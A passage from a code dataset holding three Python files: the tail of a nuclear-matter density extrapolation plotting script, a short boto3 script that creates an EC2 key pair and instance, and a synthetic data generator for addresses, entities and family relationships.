0\n# for loop1 in range(subspace_dimension):\n# ev = eigvals[loop1]\n# if ev.imag >0.01 :\n# continue\n# # if ev.real < 0:\n# # continue\n# ev_all[loop2] = ev.real\n# loop2 = loop2+1\n#\n# ev_sorted = sorted(ev_all)\n #print('eigvals='+str (ev_sorted))\n #print('eigvec_L='+str (eigvec_L))\n #print('eigvec_0='+str (eigvec_0))\n\n #print('eigvals_gs='+str (ev_sorted[1]))\n# print (\"ccd energy from emulator:\"+str(ev_sorted[0]))\n return eigvals,eigvals\n\n\n\n\n\n\n\n######################################################\n######################################################\n#### MAIN density extrapolation (validation)\n######################################################\n######################################################\nsubspace_dimension = 1 \nLEC_num = 17\nLEC_range = 0.2\nLEC = np.ones(LEC_num)\nnucl_matt_exe = './prog_ccm.exe'\ndatabase_dir = '/work/Eigenvector_continuation/CCM_kspace_deltafull/test/backup/DNNLOgo450_dens_5points' \n\n\n#print (\"ev_all=\"+str(ev_all))\n\n# start validation \n\ndens_min = 0.14\ndens_max = 0.30\ndens_gap = 0.02\ndens_count = int((dens_max - dens_min) / dens_gap + 2)\nprint (dens_count)\ndens = np.zeros(dens_count)\nccd_cal = np.zeros(dens_count) \nemulator_cal = np.zeros(dens_count) \n\nfor loop1 in range(dens_count):\n dens[loop1] = dens_min + ( dens_gap * loop1)\n print(\"densty = \"+str(dens))\n file_path = \"ccm_in_DNNLO450\"\n LEC = read_LEC(file_path)\n #ccd_cal[loop1] = nuclear_matter(LEC,dens[loop1])\n ccd_cal[loop1] = 0\n emulator_cal[loop1], ev_all = emulator(LEC,dens[loop1])\n file_path = \"density_extrapolation.txt\"\n with open(file_path,'a') as f_1:\n f_1.write('dens=%.4f ccd = %.12f emulator = %.12f \\n' % (dens[loop1],ccd_cal[loop1], emulator_cal[loop1]))\n file_path = \"density_extrapolation_detail.txt\"\n with open(file_path,'a') as f_2:\n f_2.write('dens=%.4f ccd = %.12f emulator = %.12f all =' % (dens[loop1], ccd_cal[loop1], emulator_cal[loop1]))\n f_2.write(str(ev_all))\n f_2.write('\\n')\n\n\n# plot\nx_list_1 = dens # dens\ny_list_1 = ccd_cal # ccd\ny_list_2 = emulator_cal # extrapolation\n\nprint(x_list_1)\nprint(y_list_1)\n\n\nfile_path = \"subspace_sample_5point.txt\"\ndata_num = input_raw_data_count(file_path)\nraw_data_2 = np.zeros((data_num,2),dtype = np.float)\ninput_file_2(file_path,raw_data_2)\n\nx_list_3 = raw_data_2[:,0] # subspace data\ny_list_3 = raw_data_2[:,1] #\n\nprint(x_list_3)\nprint(y_list_3)\n\ninterpol_count = 100 \n\ndens = x_list_1\nspl_pnm = interpolate.UnivariateSpline(dens,y_list_2,k = 5)\nspldens = np.linspace(dens[0],dens[len(dens)-1],num=interpol_count)\n\ninterp_pnm = spl_pnm(spldens)\n\nx_list_2_new = spldens\ny_list_2_new = interp_pnm \n\n# start plotting\nfig1 = plt.figure('fig1')\nl1 = plt.scatter(x_list_1,y_list_1,color = 'r', marker = 'd',zorder=1,label=\"CCD calculation\")\nl2 = plt.plot(x_list_2_new,y_list_2_new,color = 'k',linestyle=':',linewidth=1.5,alpha=0.9, label=\"SP-CC(5)\",zorder=1)\nl3 = plt.plot(x_list_3,y_list_3,color = 'k', marker = 'o',markersize = 10,markerfacecolor='none',linestyle='',zorder=3, label=\"subspace samples\")\n\n#plt.yticks(np.arange(8,24,2),fontsize = 13) \n#plt.xticks(np.arange(0.12,0.205,0.01),fontsize = 13) \nplt.legend(loc='lower right',fontsize = 13)\n\nplt.ylabel('$E/A$ [MeV]',fontsize=18)\nplt.xlabel(r\"$\\rho$ [fm$^{-3}$]\",fontsize=18)\n\nplot_path = 'density_extrapolation.pdf'\nplt.savefig(plot_path,bbox_inches='tight')\n\n\n\n\n\n\n\n\n\n","sub_path":"test/dens_extrapolation.py","file_name":"dens_extrapolation.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"653894933","text":"import boto3\nec2_cli=boto3.client('ec2')\noutfile=open('ec2_key.pem','w')\nkeypair=ec2_cli.create_key_pair(KeyName='ec2_key')\noutfile.write(keypair['KeyMaterial'])\ninstance=ec2_cli.run_instances(\n ImageId='ami-0affd4508a5d2481b',\n InstanceType='t2.micro',\n MinCount=1,\n MaxCount=1,\n KeyName='ec2_key',\n SecurityGroupIds=['All_TCP_IP'],\n TagSpecifications=[\n {\n 'ResourceType':'instance',\n 'Tags':[\n {\n 'Key':'Name',\n 'Value':'with-python'\n }\n ]\n }\n ]\n\t )\n \n","sub_path":"Udemy/BOTO3/check/create_key_inst.py","file_name":"create_key_inst.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"372935806","text":"import re\nimport json\nimport random\nimport enum\nimport sys\nimport unittest\nfrom src.main.utils import myutils\n\ndef p(s):\n print(s)\n\nclass sql_data_maker:\n\n '''\n table0 cities\n id,state,city,base_zip\n table1 address\n address\n id,id_cities,street,address,unit,zip,id_address_type\n table2 entity_type\n id,entity_category,entity_type,entity_name\n table3 owner_of_address\n id,id_address,id_entity_buyer,id_entity_seller,purchase_price,purchase_date\n table4 entities\n id,namefirst,namelast,id_entity_type,start_date,end_date\n table5 inventory_catalog\n id,id_entity_type,id_address,msrp\n table6 inventory_receipts\n id,id_entity_from,id_entity_toe,id_address_from,id_address_to,purchase_price,qty,date\n table7 relationships\n id_src,id_dst,relationship_type\n\n\nd_relationships:{\n id0:{\n S_ENTITY_RELATE_SIBLING: {id1,id2}, # not objects!\n S_ENTITY_RELATE_PARENT: {id3,id4},\n S_ENTITY_RELATE_COUPLE: {id5,id6},\n S_ENTITY_RELATE_CHILD: {id7,id8}\n },\n id1:{\n S_ENTITY_RELATE_SIBLING: {id0,id2},\n S_ENTITY_RELATE_PARENT: {id3,id4},\n S_ENTITY_RELATE_COUPLE: {id6},\n S_ENTITY_RELATE_CHILD: {id9,id10}\n },\n}\n\nd_entities:{\n id0:{\n S_ID:id,\n S_ENTITY_FIRSTNAME:str,\n S_ENTITY_LASTNAME:str,\n S_ENTITY_TYPE:leaf value of S_ENTITY_TYPE\n },\n id1:{\n S_ID:id,\n S_ENTITY_FIRSTNAME:str,\n S_ENTITY_LASTNAME:str,\n S_ENTITY_TYPE:leaf value of S_ENTITY_TYPE\n }\n}\n\n\ndata\n|\n+---S_DATAKEY_STATES\n |\n +---STATE1\n | |\n | +---S_DATAKEY_CITIES\n | |\n | +---CITY1\n | | |\n | | +---S_KEY_CITY_BASE_ZIP:v\n | | |\n | | +---S_DATAKEY_STREETS\n | | |\n | | +---STREET1\n | | | |\n | | | +---S\n | | | +---S_DATAKEY_ADDRS\n | | | |\n | | | +---ADDR1\n | | | | |\n | | | | +---S_DATAKEY_ADDR_ZIP:v\n | | | | +---S_DATAKEY_ADDR_NUM_ID:v\n | | | | +---S_DATAKEY_ADDR_UNIT_ID:v\n | | | | +---S_DATAKEY_ADDR_TYPE:v\n | | | |\n | | | +---ADDR2\n | | |\n | | +---STREET2\n | |\n | +---CITY2\n |\n +---STATE2\n\ninventory\n|\n+---S_CAT_CONSUME\n |\n +---S_CONSUME_FRUITS\n | |\n | +---S_ARRAY\n | |\n | 0---apple\n | | |\n | | +---S_MSRP:price\n | | |\n | | +---S_ARRAY_PRICEPOINTS:[price0,price1,price2,price3,price4]\n | |\n | 1---banana\n | |\n | +---S_ARRAY_PRICEPOINTS:[price0,price1,price2,price3,price4]\n |\n +---S_CONSUME_VEGS\n |\n +---S_ARRAY\n |\n 0---tomato\n\ninventory_durables\n\n'''\n S_CAT_ADDR = 'category_address'\n S_ADDR_RES = 'resident'\n S_ADDR_RES_VIRT = 'resident_virtual'\n S_ADDR_RES_LAND = 'resident_land'\n S_ADDR_BUS = 'business'\n S_RES_PRIM_LAND = 'primary_land'\n S_RES_PRIM_VIRT = 'primary_virtual'\n S_RES_SEC_LAND = 'secondary_land'\n S_RES_SEC_VIRT = 'secondary_virtual'\n S_BUS_PRV = 'business_private'\n S_BUS_PUB = 'business_public'\n S_CAT_CONSUME = 'category_consume'\n S_CONSUME_FRUITS = 'fruits'\n S_CONSUME_VEGS = 'vegs'\n S_CONSUME_GRAINS = 'grains'\n S_CONSUME_MEAT = 'meat'\n S_CONSUME_DRINK = 'drink'\n S_CAT_DURABLES = 'durables'\n S_DURABLE_SHIRTS = 'shirts'\n S_DURABLE_PANTS = 'pants'\n S_DURABLE_CLOTHES = 'clothes'\n S_DURABLE_ACC = 'accessories'\n\n S_ITEM_NAME = 'itemname'\n S_NUM_PRICEPOINTS = 5\n S_CONSUME_PRICEPOINTS_PCT = [50,75,100,150,300]\n S_DURABLE_PRICEPOINTS_PCT = [50,100,150,300,800]\n S_ARRAY_PRICEPOINTS = 'pricepoints'\n S_MSRP = 'msrp'\n S_ARRAY = 'array'\n S_CONSUME_MSRP_MIN_PCT = 50\n S_CONSUME_MSRP_MAX_PCT = 200\n S_CONSUME_LEVEL_MIN_PCT = 50\n S_CONSUME_LEVEL_MAX_PCT = 300\n S_DURABLE_MSRP_MIN_PCT = 50\n S_DURABLE_MSRP_MAX_PCT = 200\n S_DURABLE_LEVEL_MIN_PCT = 50\n S_DURABLE_LEVEL_MAX_PCT = 800\n\n S_PCT_TO_SELECT_MIN = 30\n S_PCT_TO_SELECT_MAX = 80\n S_EXPENSE_LEVEL_MIN = 0\n S_EXPENSE_LEVEL_MAX = 5\n\n S_CONSUME_FRUITS_MSRP = 40\n S_CONSUME_VEGS_MSRP = 20\n S_CONSUME_GRAINS_MSRP = 50\n S_CONSUME_MEAT_MSRP = 80\n S_CONSUME_DRINK_MSRP = 20\n S_DURABLE_SHIRTS_MSRP = 200\n S_DURABLE_PANTS_MSRP = 300\n S_DURABLE_ACC_MSRP = 400\n S_ZIP_INC_THRESHOLD = 20\n S_ZIP = 'zip'\n S_STREET = 'streetname'\n S_ADDR = 'addr_num'\n S_ADDR_UNIT = 'addr_unit_num'\n S_ADDR_TYPE = 'addr_type'\n S_ADDRESSES = 'addresses'\n S_SELECT_LIKELY_PCT = 80\n S_ENTITY_RELATIONSHIP = 'relationship'\n S_ENTITY_RELATE_SIBLING = 'sibling'\n S_ENTITY_RELATE_PARENT = 'parent'\n S_ENTITY_RELATE_COUPLE = 'couple'\n S_ENTITY_RELATE_CHILD = 'child'\n S_ENTITY_FIRSTNAME = 'firstname'\n S_ENTITY_LASTNAME = 'lastname'\n S_ENTITY_START_DATE = 'startdate'\n S_ENTITY_END_DATE = 'enddate'\n S_ENTITY_MALE = 'male'\n S_ENTITY_FEMALE = 'female'\n S_ENTITY_OTHER = 'other'\n S_ENTITY_TYPE = 'entity_type'\n S_ENTITYT_PERSON = 'entityt_person'\n S_ENTITYT_VIRTUAL = 'entityt_virtual'\n S_ENTITYT_ANIMAL = 'entityt_animal'\n S_ENTITYT_FARM_ANIMAL = 'entityt_farm_animal'\n S_ENTITYT_HOUSE_ANIMAL = 'entityt_house_animal'\n S_ENTITYT_WILD_ANIMAL = 'entityt_wild_animal'\n S_BASE_ZIP = 'base_zip'\n S_KEY_CITY_BASE_ZIP = 'city_base_zip'\n S_DATAKEY_STATES = 'states'\n S_DATAKEY_CITIES = 'cities'\n S_DATAKEY_STREETS = 'streets'\n S_DATAKEY_STREET_NAME = 'street_name'\n S_DATAKEY_ADDRS = 'addresses'\n S_DATAKEY_ADDR_UNITS = 'address_units'\n S_DATAKEY_ADDR_ZIP = 'zip'\n S_DATAKEY_ADDR_NUM_ID = 'id_addr_num'\n S_DATAKEY_ADDR_UNIT_ID = 'id_addr_unit'\n S_DATAKEY_ADDR_TYPE = 'addr_type'\n S_ID = 'id'\n\n\n def __init__(self):\n self.entity_types = self.make_entity_type()\n self.data_entities = {\n self.S_ENTITYT_PERSON:{},\n self.S_ENTITYT_VIRTUAL:{},\n self.S_ENTITYT_ANIMAL:{}\n }\n self.d_msrp = {\n self.S_CONSUME_FRUITS: self.S_CONSUME_FRUITS_MSRP,\n self.S_CONSUME_VEGS: self.S_CONSUME_VEGS_MSRP,\n self.S_CONSUME_GRAINS: self.S_CONSUME_GRAINS_MSRP,\n self.S_CONSUME_MEAT: self.S_CONSUME_MEAT_MSRP,\n self.S_CONSUME_DRINK: self.S_CONSUME_DRINK_MSRP,\n self.S_DURABLE_PANTS: self.S_DURABLE_PANTS_MSRP,\n self.S_DURABLE_SHIRTS: self.S_DURABLE_SHIRTS_MSRP,\n self.S_DURABLE_ACC: self.S_DURABLE_ACC_MSRP\n }\n self.data_relationships = {}\n self.data_addresses = {}\n self.inventory = {}\n self.min_address_per_street = 1\n self.max_address_per_street = 5\n self.address_starting_val = 10\n self.pct_chance_of_unit_if_has_virtual = 50\n self.min_num_streets_threshold_for_units = 2\n self.pct_has_units_in_city = 25\n self.pct_has_units_in_street = 50\n self.pct_has_units_in_address = 50\n self.min_unit_per_address = 2\n self.max_unit_per_address = 10\n self.min_num_people_per_state = 50\n self.max_num_people_per_state = 100\n self.max_num_person = 1000\n self.max_num_virtual = 200\n self.max_num_animal = 2000\n self.max_num_children_per_couple = 6\n self.max_level_relationship_descendants = 10\n self.num_original_descendants = 20\n self.pct_carry_over_currgen_2_nextgen = 20\n self.u = myutils.my_utils\n pass\n\n def test_make_receipt_table_1(self):\n products = {\n 'apples':{\n 'product_type':'food',\n 'product_subtype':'fruit',\n 'avg_price':1.00,\n 'variation':0.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'bananas':{\n 'product_type':'food',\n 'product_subtype':'fruit',\n 'avg_price':2.00,\n 'variation':0.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'milk':{\n 'product_type':'food',\n 'product_subtype':'dairy',\n 'avg_price':5.00,\n 'variation':1.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'coffee':{\n 'product_type':'food',\n 'product_subtype':'beverage',\n 'avg_price':7.00,\n 'variation':5.00,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'tea':{\n 'product_type':'food',\n 'product_subtype':'beverage',\n 'avg_price':4.00,\n 'variation':4.00,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'socks':{\n 'product_type':'fashion',\n 'product_subtype':'clothes',\n 'avg_price':8.00,\n 'variation':5.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'shirts':{\n 'product_type':'fashion',\n 'product_subtype':'clothes',\n 'avg_price':20.00,\n 'variation':20.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'sunglasses':{\n 'product_type':'fashion',\n 'product_subtype':'accessories',\n 'avg_price':30.00,\n 'variation':30.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'phone':{\n 'product_type':'electronics',\n 'product_subtype':'communications',\n 'avg_price':500.00,\n 'avg_price':200.00,\n 'is_bulkable':False,\n 'is_manufactued':True\n },\n 'laptop':{\n 'product_type':'electronics',\n 'product_subtype':'productivity',\n 'avg_price':1000.00,\n 'avg_price':2000.00,\n 'is_bulkable':False,\n 'is_manufactued':True\n }\n }\n\n\n def make_names(self,min_syllables,max_syllables,consonants,vowels,num,allow_duplicates):\n num_possibilities = len(consonants)*len(vowels)*(max_syllables-min_syllables+1)\n if(not allow_duplicates and num_possibilities < num):\n raise Exception('ERROR make_state_names: num:{} < num_possibilities:{}'.format(num,num_possibilities))\n data = []\n data_set = set()\n max_attempts = 100_000\n ctr = 0\n while len(data) < num:\n num_syllables = myutils.my_utils.rand_int(min_syllables,max_syllables)\n name = myutils.my_utils.make_random_word_from_charset(consonants,vowels,num_syllables,False)\n if allow_duplicates or name not in data_set:\n data.append(name)\n ctr += 1\n if ctr > max_attempts:\n break\n return data\n def make_state_names(self,num):\n consonants = ['b','c','d','f','g']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_city_names(self,num):\n consonants = ['f','g','h','j','k']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_street_names(self,num):\n consonants = ['f','g','h','j','k']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_last_names(self,num):\n consonants = ['b','m','p']\n vowels = ['a','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_first_names(self,num):\n consonants = ['b','c','d','g','h','j']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_virtual_names(self,num):\n consonants = ['b','c','d','g','h','j']\n vowels = ['a','e']\n data = self.make_names(2,5,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_animal_names(self,num):\n consonants = ['g','m','p']\n vowels = ['a','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_table_cities(self,num_states,min_cities_per_state,max_cities_per_state):\n data = self.data_addresses\n states = self.make_state_names(num_states)\n base_zip = 10000\n d_states = {}\n data[self.S_DATAKEY_STATES] = d_states\n for state in states:\n d_states[state] = {}\n d_cities = {}\n d_states[state][self.S_DATAKEY_CITIES] = d_cities\n num_cities = myutils.my_utils.rand_int(min_cities_per_state,max_cities_per_state)\n cities = self.make_city_names(num_cities)\n offset = 0\n for city in cities:\n d_cities[city] = {}\n d_cities[city][self.S_DATAKEY_STREETS] = {}\n d_cities[city][self.S_KEY_CITY_BASE_ZIP] = base_zip + offset*10 # so each city can have max 10 zips\n offset += 1\n base_zip += 1000\n return data\n\n def make_entity_type(self):\n data = {}\n data[self.S_CAT_ADDR] = {\n self.S_ADDR_RES: {\n self.S_ADDR_RES_VIRT:[\n self.S_RES_PRIM_VIRT,\n self.S_RES_SEC_VIRT\n ],\n self.S_ADDR_RES_LAND:[\n self.S_RES_PRIM_LAND,\n self.S_RES_SEC_LAND\n ]\n },\n self.S_ADDR_BUS:[\n self.S_BUS_PRV,\n self.S_BUS_PUB\n ]\n }\n data[self.S_ENTITY_TYPE] = {\n self.S_ENTITYT_PERSON: [self.S_ENTITY_FEMALE,self.S_ENTITY_MALE],\n self.S_ENTITYT_VIRTUAL: ['company','govt','club'],\n self.S_ENTITYT_ANIMAL: {\n self.S_ENTITYT_FARM_ANIMAL: ['farmchicken','farmfish','farmlamb'],\n self.S_ENTITYT_HOUSE_ANIMAL: ['housecat','housedog'],\n self.S_ENTITYT_WILD_ANIMAL: ['wildcat','wilddog','wildbird','wildraccoon','wildfish']\n }\n }\n data[self.S_ENTITY_RELATIONSHIP] = [\n self.S_ENTITY_RELATE_SIBLING,\n self.S_ENTITY_RELATE_PARENT,\n self.S_ENTITY_RELATE_COUPLE,\n self.S_ENTITY_RELATE_CHILD\n ]\n data[self.S_CAT_CONSUME] = {\n self.S_CONSUME_FRUITS: ['apple','banana','orange'],\n self.S_CONSUME_VEGS: ['tomato','carrot','onion','beans','potato'],\n self.S_CONSUME_GRAINS: ['rice','bread','lentil'],\n self.S_CONSUME_MEAT: ['chicken','fish','lamb'],\n self.S_CONSUME_DRINK: ['water','juice','tea','coffee','milk','wine']\n }\n data[self.S_CAT_DURABLES] = {\n self.S_DURABLE_PANTS: ['pant','shorts','wrap','jeans'],\n self.S_DURABLE_SHIRTS: ['tshirt','jacket','wrap','longsleeve','shortsleeve'],\n self.S_DURABLE_ACC: ['shoes','wallet','purse','hat','sunglass']\n }\n return data\n\n def choose_type(self,list_path_keys,num_elements=1):\n def traverse_subpaths_extend_leafs(kvnode,leafs):\n if isinstance(kvnode,list):\n leafs.extend(kvnode)\n elif isinstance(kvnode,dict):\n for k,v in kvnode.items():\n traverse_subpaths_extend_leafs(v,leafs)\n data = self.entity_types\n if not isinstance(list_path_keys,list) or list_path_keys == None:\n raise Exception('ERROR list_path_keys is not list or is null')\n for path in list_path_keys:\n if path not in data:\n raise Exception('ERROR choose_type:{} not in entity_types:{}'.format(path,data.keys()))\n data = data[path]\n leafs = []\n traverse_subpaths_extend_leafs(data,leafs)\n sz = len(leafs)\n res = []\n for ctr in range(num_elements):\n i = myutils.my_utils.rand_int(0,sz)\n res.append(leafs[i])\n return res\n\n def make_table_addresses(self, data, min_num_streets, max_num_streets):\n '''\n data input is dict and has figure1 layout in class description\n '''\n min_inc_val = 1\n max_inc_val = 10\n for state,cities in data[self.S_DATAKEY_STATES].items():\n for city,d_city in cities[self.S_DATAKEY_CITIES].items():\n num_streets = myutils.my_utils.rand_int(min_num_streets,max_num_streets)\n has_virtual = True if num_streets >= self.min_num_streets_threshold_for_units else False\n has_units_c = myutils.my_utils.rand_bool(self.pct_chance_of_unit_if_has_virtual)\n zip_val = d_city[self.S_KEY_CITY_BASE_ZIP]\n d_streets = {}\n d_city[self.S_DATAKEY_STREETS] = d_streets\n cnt_addr = 0\n street_names = self.make_street_names(num_streets)\n for street_name in street_names:\n street = {}\n d_streets[street_name] = street\n #d_streets[self.S_DATAKEY_STREET_NAME] = street\n street[self.S_DATAKEY_STREET_NAME] = street_name\n #d_streets[self.S_DATAKEY_STREET_NAME] = street_name\n d_addresses = {}\n #d_streets[self.S_DATAKEY_ADDRS] = d_addresses\n street[self.S_DATAKEY_ADDRS] = d_addresses\n num_addresses = myutils.my_utils.rand_int(self.min_address_per_street,self.max_address_per_street)\n id_address_val = self.address_starting_val\n inc_val = myutils.my_utils.rand_int(min_inc_val,max_inc_val) # address 100,105,110,...\n pct_business = myutils.my_utils.get_rand_pct(1,4) if has_units_c else 0 # 0,25,50,75,100\n has_units_s = myutils.my_utils.rand_bool(self.pct_has_units_in_street) if has_units_c else False\n for i in range(num_addresses):\n is_business = myutils.my_utils.pct_is_true(pct_business)\n addr_type = self.choose_type([self.S_CAT_ADDR,self.S_ADDR_BUS]) if is_business else self.choose_type([self.S_CAT_ADDR,self.S_ADDR_RES])\n has_unit_s = myutils.my_utils.rand_bool(self.pct_has_units_in_address) if has_units_s else False\n if addr_type[0] == self.S_RES_PRIM_LAND or addr_type[0] == self.S_RES_SEC_LAND:\n has_unit_s = False\n address_obj = {}\n #address_obj[self.S_STREET] = street_name\n address_obj[self.S_ZIP] = zip_val\n if has_unit_s:\n num_units = myutils.my_utils.rand_int(self.min_unit_per_address,self.max_unit_per_address)\n d_address_units = {}\n address_obj[self.S_DATAKEY_ADDR_UNITS] = d_address_units\n address_obj[self.S_ADDR_TYPE] = addr_type[0]\n d_addresses[id_address_val] = address_obj\n #d_addresses[self.S_DATAKEY_ADDR_UNITS] = d_address_units\n #d_addresses[id_address_val] = d_address_units\n for id_address_unit in range(num_units):\n id_address_unit += 1\n address_unit_obj = address_obj.copy()\n addr_type = self.choose_type([self.S_CAT_ADDR,self.S_ADDR_BUS]) if is_business else self.choose_type([self.S_CAT_ADDR,self.S_ADDR_RES,self.S_ADDR_RES_VIRT])\n address_unit_obj[self.S_ADDR_TYPE] = addr_type[0]\n address_unit_obj[self.S_ADDR_UNIT] = id_address_unit\n #d_address_units[id_address_unit] = address_unit_obj\n cnt_addr += 1\n else:\n address_obj[self.S_ADDR_TYPE] = addr_type[0]\n d_addresses[id_address_val] = address_obj\n cnt_addr += 1\n id_address_val += inc_val\n if cnt_addr > self.S_ZIP_INC_THRESHOLD:\n zip_val += 1\n cnt_addr = 1\n\n return data\n\n def make_table_entities(self):\n '''\n entities:{\n S_ENTITYT_PERSON: {\n id1:{\n id,\n namefirst,namelast,\n id_entity_type (S_ENTITY_TYPE),\n start_date: date\n end_date: date\n },\n id2:{...},\n ...\n },\n S_ENTITYT_VIRTUAL: {\n ...\n },\n S_ENTITYT_ANIMAL: {\n ...\n },\n }\n '''\n\n data_entities = self.data_entities\n data_relationships = self.data_relationships\n\n self.make_people_and_relationships(data_entities[self.S_ENTITYT_PERSON],data_relationships)\n\n id = 0\n virtualnames = list(self.make_virtual_names(self.max_num_virtual))\n for virtualname in virtualnames:\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_VIRTUAL])\n entity = {\n self.S_ID:id,\n self.S_ENTITY_FIRSTNAME:None,\n self.S_ENTITY_LASTNAME:virtualname,\n self.S_ENTITY_TYPE:etype[0]\n }\n data_entities[self.S_ENTITYT_VIRTUAL][id] = entity\n id += 1\n\n\n id = 0\n animal_names = list(self.make_animal_names(self.max_num_animal))\n for i in range(self.max_num_animal):\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_ANIMAL])\n name = None\n if etype[0] in self.entity_types[self.S_ENTITY_TYPE][self.S_ENTITYT_ANIMAL][self.S_ENTITYT_HOUSE_ANIMAL]:\n name = animal_names[i]\n entity = {\n self.S_ID:id,\n self.S_ENTITY_FIRSTNAME:name,\n self.S_ENTITY_LASTNAME:None,\n self.S_ENTITY_TYPE:etype[0]\n }\n data_entities[self.S_ENTITYT_ANIMAL][id] = entity\n id += 1\n return (data_entities,data_relationships)\n\n def make_people_and_relationships(self, dentities, drelationships):\n\n def init_relationship_id(drelationship,id):\n if id not in drelationship:\n drelationship[id] = {\n self.S_ENTITY_RELATE_SIBLING:[],\n self.S_ENTITY_RELATE_PARENT:[],\n self.S_ENTITY_RELATE_COUPLE:[],\n self.S_ENTITY_RELATE_CHILD:[]\n }\n\n def make_asymmetrical_relationship(e0,e1,keyid,key0to1,key1to0,drelationships):\n init_relationship_id(drelationships,e0[keyid])\n init_relationship_id(drelationships,e1[keyid])\n drelationships[e0[keyid]][key0to1].append(e1[keyid])\n drelationships[e1[keyid]][key1to0].append(e0[keyid])\n\n def make_symmetrical_relationship(e0,e1,keyid,key,drelationships):\n make_asymmetrical_relationship(e0,e1,keyid,key,key,drelationships)\n\n def match_simple(l_entity_males,l_entity_females,drelationships,allow_overlap=True):\n keyid = self.S_ID\n key = self.S_ENTITY_RELATE_COUPLE\n lm_unmatched = []\n lf_unmatched = []\n for m,f in zip(l_entity_males,l_entity_females):\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n\n szm = len(l_entity_males)\n szf = len(l_entity_females)\n if szm == szf or not allow_overlap:\n return\n elif szm < szf:\n for i in range(szm,szf):\n f = l_entity_females[i]\n m = self.u.choose_obj_from(l_entity_males)\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n else:\n for i in range(szf,szm):\n m = l_entity_males[i]\n f = self.u.choose_obj_from(l_entity_females)\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n\n # return (listfemale,listmale) from entities\n def get_m_f(entities):\n lm = []\n lf = []\n st = self.S_ENTITY_TYPE\n sm = self.S_ENTITY_MALE\n sf = self.S_ENTITY_FEMALE\n for e in entities:\n if e[st] == sm:\n lm.append(e)\n elif e[st] == sf:\n lf.append(e)\n return (lf,lm)\n\n def make_children(arrayid,f,dentities,drelationships):\n scouple = self.S_ENTITY_RELATE_COUPLE\n schild = self.S_ENTITY_RELATE_CHILD\n sparent = self.S_ENTITY_RELATE_PARENT\n ssibling = self.S_ENTITY_RELATE_SIBLING\n sid = self.S_ID\n smale = self.S_ENTITY_MALE\n stype = self.S_ENTITY_TYPE\n slname = self.S_ENTITY_LASTNAME\n sfname = self.S_ENTITY_FIRSTNAME\n lmaleids = []\n\n # choose random male\n for id in drelationships[f[sid]][scouple]:\n if dentities[id][stype] == smale:\n lmaleids.append(id)\n idm = self.u.choose_obj_from(lmaleids)\n m = dentities[idm]\n lastname = self.u.choose_obj_from([f[slname],m[slname]])\n num_children = self.u.rand_int(0,self.max_num_children_per_couple)\n firstnames = self.make_first_names(num_children)\n lchildren = []\n for i in range(num_children):\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_PERSON])\n entity = { sid:arrayid[0], sfname:firstnames[i], slname:lastname, stype:etype[0] }\n lchildren.append(entity)\n dentities[entity[sid]] = entity\n arrayid[0] += 1\n if arrayid[0] >= self.max_num_person:\n break\n\n # make relationships\n for i in range(len(lchildren)):\n child = lchildren[i]\n make_asymmetrical_relationship(m,child,sid,schild,sparent,drelationships)\n make_asymmetrical_relationship(f,child,sid,schild,sparent,drelationships)\n for j in range(i,len(lchildren)):\n sibling = lchildren[j]\n if child[sid] == sibling[sid]:\n continue\n make_symmetrical_relationship(child,sibling,sid,ssibling,drelationships)\n\n return lchildren\n\n def make_people_relationships(arrayid,dentities,drelationships):\n lcurrgen = list(dentities.values())\n while arrayid[0] < self.max_num_person:\n (lf,lm) = get_m_f(lcurrgen)\n if len(lf) == 0 or len(lm) == 0:\n return # no more generations!\n match_simple(lm,lf,drelationships,True)\n lnextgen = []\n for f in lf:\n lchildren = make_children(arrayid,f,dentities,drelationships)\n lnextgen.extend(lchildren)\n maxcarryover = int(len(lcurrgen)*self.pct_carry_over_currgen_2_nextgen/100)\n if maxcarryover > 0:\n numcarryover = self.u.rand_int(0,maxcarryover)\n if numcarryover > 0:\n carryover = self.u.choose_objs_from(lcurrgen,numcarryover)\n if len(carryover) != 0:\n lnextgen.extend(carryover)\n lcurrgen = lnextgen\n\n def make_people_origin(arrayid,dentities):\n lastnames = self.make_last_names(self.num_original_descendants)\n firstnames = self.make_first_names(self.num_original_descendants)\n l_m = []\n l_f = []\n\n for ln,fn in zip(lastnames,firstnames):\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_PERSON])\n entity = {\n self.S_ID:arrayid[0],\n self.S_ENTITY_FIRSTNAME:fn,\n self.S_ENTITY_LASTNAME:ln,\n self.S_ENTITY_TYPE:etype[0]\n }\n if etype[0] == self.S_ENTITY_FEMALE:\n l_f.append(entity)\n elif etype[0] == self.S_ENTITY_MALE:\n l_m.append(entity)\n dentities[arrayid[0]] = entity\n arrayid[0] += 1\n if arrayid[0] >= self.max_num_person:\n break\n\n if len(l_f) == 